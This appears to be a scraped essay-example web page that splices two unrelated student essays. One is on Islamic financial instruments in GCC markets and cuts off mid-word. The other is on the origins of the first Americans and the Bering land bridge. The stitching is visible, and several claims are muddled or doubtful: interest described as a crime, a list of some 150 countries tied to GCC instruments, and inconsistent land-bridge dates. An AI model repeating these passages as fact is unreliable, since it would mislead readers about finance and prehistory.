Islamic Financial Instruments on stock markets in GCC - Essay Example The term Sukuk is an Arabic word that is identical to the aspects of a financial instrument and is an equivalent instrument such as a bond under Islamic perspective of banking. But contrary to the usual financial instrument Sukuk is different as there are no fixed incomes as under the laws of Islam interests are seen as a crime. Therefore as an alternative it has been instrumented to use such non tangible or tangible assets that are could be classified according to the basic non tradability or tradability. But once again, under the principals of Islam these formulations could only be used in the secondary market. (Zia-ud-din, 229) According to the estimation of the 'Islamic Banking and Financial Institutions: The Progress and Probability' published in 2005, there are around $521 billion worth of financial assets that are circulating in the fiscal market as per year ending March 2005. (Asif, 337) The entire amount of this investment regulated by principals of Islamic investment plans it could be enumerated that the entire procedure is regulated by the moral and spiritual obligations of the 'Shari'ah'. Therefore it is seen that the Islamic financials instruments traded on GCC financials markets are huge and there are a number of countries who regularly uses this form of banking. The countries can be enumerated as USA, UK, Yemen, UAE, Turkey, Tunisia, Switzerland, Sudan, Sri Lanka, South Africa, Senegal, Saudi Arabia, Russia, Qatar, Palestine, Pakistan and around 150 countries all over the world. Malaysia is one of the key player of this form of banking. Dallah Al Baraka (Malaysia) Holding Sdn Bhd, Malayan Banking Berhad (Maybank), Kuala Lumpur, Islamic banking & Takaful Dept, Bank Negara Malaysia, United Malayan Banking Corp. Berhad, Kuala Lumpur, Labuan Offshore Financial Services Authority (LOFSA) and Lembaga Urusan Dan Tabung Haji (Fund), Kuala Lumpur are the few most important financial institutions of the country. (Syyed, 98) The financial institutions that that deal with the instruments can be enumerated as International Islamic Financial Markets, Mudaraba Companies, Takaful Companies (These are basically insurance companies), Islamic Mortgage Companies, Islamic Windows, Islamic Investment Funds and Banks and Islamic Banks. Under these institutions there are different plans such as Mudaraba which are basically Capital trust financing where the basic implementation is the contact which accumulates the capital along with the cost. However there are also other schemes that are marked up. Then there are also other plans under which leasing comes into consideration. This called Ijara. There is also another technique that is defined Ijara wa Iktin wa which is basically the contract of hire purchase. (Iqbal, 33) The basic limitations of these plans are based on the contracts between the parties but the over all scenarios are based on the principals of Islam where a financial instrument like Musharaka is treated as long termed investment under the parameters of equity arrangement. The capital supplied in this case is the bank and the clients. The profit in this case is shared among the concerned parties in according to prior agreement whereas the loss is shared in accordance to the capital invested. On the other hand another financial instrum

Tuesday, August 13, 2019

American History Essay Example | Topics and Well Written Essays - 750 words

American History - Essay Example These images have a significant influence on the way students and historians perceive their past (Chrestien, 104). This paper evaluates a number of primary sources that accrue to the history of the first Americans while relating the sources in terms of their contributions to the current written history. In 1926, George McJunkin, an African-American cowboy, made a discovery that hugely changed the perception towards North America’s first natives (Johnson, 31). He spotted bleached bones while tracking lost cattle near Folsom, New Mexico but the bones were later found to belong to a bison species extinct for more than 10,000 years (Johnson, 33). The talk point of the discovery was the spearheads made of stone by humans found mixed with the bones, which meant that Indian ancestry could be traced back to thousands of years before the time thought by most of the 20th century authorities. As Johnson (48) asserts, the first Europeans who inhabited America in the 15th century believed that this was the new world but this discovery disapproved them as it was established that more that 20,000 years before, there were inhabitants in the area. There exist no documented records to affirm that diversity of societies in early America thrived, although the differences in cultural practices and languages were enough proof. In order to reshape this history, Johnson (66) believes that one has to look at the various primary sources of information, mainly archeological artifacts, which record the past behaviors of the humans. A wide range of artifacts that includes basket snippets, pottery fragments, oral traditions, discarded tools/ equipment, and food remains have been used by archeologists, anthropologists and historians to put together relevant pieces of information about the social organization, diet, and technology of these people and the changes they have gone through over time. In the 16th century, Chrestien (105) argues that Europeans believed that Indians originated from the Lost Tribes of Israel with reference to the Bible, while others associated their ancestry with the myth of the lost continent of Atlantis while another suggestion came from a Spanish missionary (Jose de Acosta) that the Indians are part of the small group of hunters that was driven away from their Asian homes by starvation and other hardships. The notion that America’s first habitats came from Asia is supported by physical anthropology. American natives and people of northeast Asia have common physical traits that form a strong line of evidence that North America was inhabited by Indians. These physical traits include (Johnson, 101); i. Straight black hair. ii. Wide cheekbones. iii. Shovel-shaped incisors. iv. Dark brown eyes. Bering Strait, which currently separates Siberia and Alaska, has been believed to be the area used by America’s pioneers to cross into North America (Johnson, 121). According to Johnson (122), this took place around 25,000 to 70,000 yea rs ago during one of the ice ages where large volumes of water froze into glaciers creating a land bridge between Alaska and Siberia. The land bridge is believed to have appeared twice; between 26,000 and 28, 000 years ago, and between 10,000-12,000 and 20,000 years ago (Johnson, 145). It is during this period that authorities believe Indians came into America as they followed the migratory patterns of animals which were their major source of food with the aid of the Beringia (the land bridge formed from the frozen waters) (Chrestien, 105).